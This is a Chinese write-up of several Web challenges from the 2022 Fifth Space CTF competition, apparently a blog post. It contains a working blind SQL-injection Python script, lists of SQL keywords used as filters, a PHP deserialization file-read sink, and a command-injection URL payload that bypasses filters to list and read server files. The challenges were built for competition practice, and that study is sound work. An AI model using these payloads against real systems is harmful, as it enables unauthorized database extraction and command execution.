2022第五空间网络安全大赛
Web
5_web_BaliYun
www.zip源码
<?php
class upload{public $filename;public $ext;public $size;public $Valid_ext;public function __construct(){$this->filename = $_FILES["file"]["name"];$this->ext = end(explode(".", $_FILES["file"]["name"]));$this->size = $_FILES["file"]["size"] / 1024;$this->Valid_ext = array("gif", "jpeg", "jpg", "png");}public function start(){return $this->check();}private function check(){if(file_exists($this->filename)){return "Image already exsists";}elseif(!in_array($this->ext, $this->Valid_ext)){return "Only Image Can Be Uploaded";}else{return $this->move();}}private function move(){move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$this->filename);return "Upload succsess!";}public function __wakeup(){echo file_get_contents($this->filename);}
}class check_img{public $img_name;public function __construct(){$this->img_name = $_GET['img_name'];}public function img_check(){if(file_exists($this->img_name)){return "Image exsists";}else{return "Image not exsists";}}
}
flag{sdbvETXct77cKuRWKCw8frYEfXEYhDCa}
5_easylogin
sql注入
fuzz过滤 存在用户admin
blacklist
or
|
and
"
#
%20
&
^
updatexml
sleep
rand
like
handler
extractvalue
benchmark
value
regexp
=
whitelist
'
--
/**/
select
%09
%0a
从返回头看到是gbk编码,尝试宽字节注入
最后构造虚表登陆
5_web_Eeeeasy_SQL
引号被过引号滤了,使用反斜杠逃逸,or可以用 利用pow整型溢出报错,使用(password<0x50)判断原理如下
当大于小于都报错的时候就是等于,根据这个原理注入出来password为
同理注入从而盲注出用户名和密码 Flag_Account:G1ve_Y0u_@_K3y_70_937_f14g!!!
脚本
# -*- coding: utf-8 -*-
# @Time : 2022/9/19 17:15
# @Author : pysnow
import requests
import stringurl = 'http://39.107.81.36:54028/api/api.php?command=login'
res = ''
tmp = ''
ses = requests.session()
dic = string.ascii_letters + string.digits + '_@!{}'
for i in range(32):for j in range(27, 127):tmp = hex(j)[2:]payload = "or\x09(case\x09when(binary(password)>0x" + res + tmp + ")\x09then\x091\x09else\x09pow(99,9999999)\x09end)#"data = {"username": 'admin\\',"password": payload}# print(payload)r = ses.post(url=url, data=data, allow_redirects=False)if 'success' not in r.text:res += hex(j - 1)[2:]breakprint(res)
这里要用binary转换为2进制比较,直接字符串比较会分不清大小写访问api/flag.php,给了源码读文件过滤了/flag,直接//flag进行绕过
5_web_letmeguess_1
提示弱口令,admin:admin123
接着命令执行绕过
ls->dir
/->cd ..(也可以使用${}构造斜杠)http://39.106.155.180:8267/index.php?ip=127.0.0.1%0Acd%09ky*%0Anl%09*
2022第五空间网络安全大赛相关推荐
- 2022浙江网络安全大赛
GipsyT Web nisc_学校门户网站 吃豆人吃豆魂 Crypto easystream3 easyrsrsa1 MISC 好怪哦 欢迎来玩 我的博客 Web nisc_学校门户网站 找到登录页 ...
- 第三届第五空间网络安全大赛WP(部分)
Web 1.PNG图片转换器 附件的web源码如下 require 'sinatra' require 'digest' require 'base64'get '/' doopen("./ ...
- 2022第二届网刃杯网络安全大赛-Web
2022第二届网刃杯网络安全大赛-Web 前言 提示:该内容由夜刃TEOT战队-夜白君师傅原创,禁止抄袭! 一.Web2-upload 难度系数:4.0 题目描述:只有想不到,没有做不到,sql yy ...
- 2022第二届网刃杯网络安全大赛-Re
2022第二届网刃杯网络安全大赛-Re 前言 提示:该内容由夜刃TEOT战队-rootkit师傅原创,禁止抄袭! 一.RE1-ez_algorithm? 难度系数:5.0 题目描述:就是玩!!! 输入 ...
- 2022第二届网刃杯网络安全大赛-ICS
2022第二届网刃杯网络安全大赛-ICS 前言 提示:该内容由夜刃TEOT战队-夜白君师傅原创,禁止抄袭! 一.ICS1-ncsubj 难度系数:4.0 题目描述:wowowow,某厂商上位机TIA ...
- 2022全国职业技能大赛-网络安全赛题解析总结②(超详细)
2022全国职业技能大赛-网络安全赛题解析总结(自己得思路) 模块A 基础设施设置与安全加固(20分) 模块B 网络安全事件响应.数字取证调查和应用安全(40分) 模块C CTF夺旗-攻击(本模块20 ...
- 2022全国职业技能大赛-网络安全赛题解析总结①(超详细)
2022全国职业技能大赛-网络安全赛题解析总结(自己得思路) 模块A 基础设施设置与安全加固(20分) 模块B 网络安全事件响应.数字取证调查和应用安全(40分) 模块C CTF夺旗-攻击(20分) ...
- 2022全国职业技能大赛-网络安全赛题解析总结⑤(超详细)
2022全国职业技能大赛-网络安全赛题解析总结(自己得思路) 模块A 基础设施设置与安全加固(20分) 模块B 网络安全事件响应.数字取证调查和应用安全(40分) 模块C CTF夺旗-攻击(20分) ...
- 中睿天下解决方案荣获“2022年网络安全优秀创新成果大赛”优秀奖
近日,中国网络安全产业联盟公布了"2022年网络安全优秀创新成果大赛"优秀奖及入围奖名单.中睿天下报送的"鱼叉式钓鱼整体解决方案"在140余家网络安全企业申报的 ...
最新文章
- mysql 存储过程月单拆天单_MySQL之存储过程按月创建表
- 张家界a货翡翠,酒泉a货翡翠
- 内存和外存的主要区别_内存与外存的关键区别有哪些?
- Java 基础 之 关系运算符
- python—多进程之进程之间通信
- HTML+CSS+JavaScript复习笔记持更(二)——列表篇
- 统计学习方法第十八章作业:PLSA 概率潜在语义分析算法 代码实现
- python怎么读取石墨表格_python – 使用AMQP和石墨9.9
- SQLyog备份与还原数据库
- mysql- 外键与 级联删除
- 世界机器人大赛总决赛现场快报:多为中小学生
- mysql5.1免安装版配置_mysql5.1免安装版配置
- java读取文件buffered_关于Java中使用BufferedReader读取文件的疑惑
- 原生xgboost与sklearn里的xgboost
- 与基础事务管理器的通信失败 存货申请_干货必读!细说分布式事务两阶段提交...
- python进程数上限_在多处理python中限制进程数
- 全球Top10最佳移动统计分析sdk
- DedeCms进行SEO优化全攻略
- html5播放器 php,PHP/HTML5页面上的随机声音播放器
- 《UNIX环境高级编程》(第3版)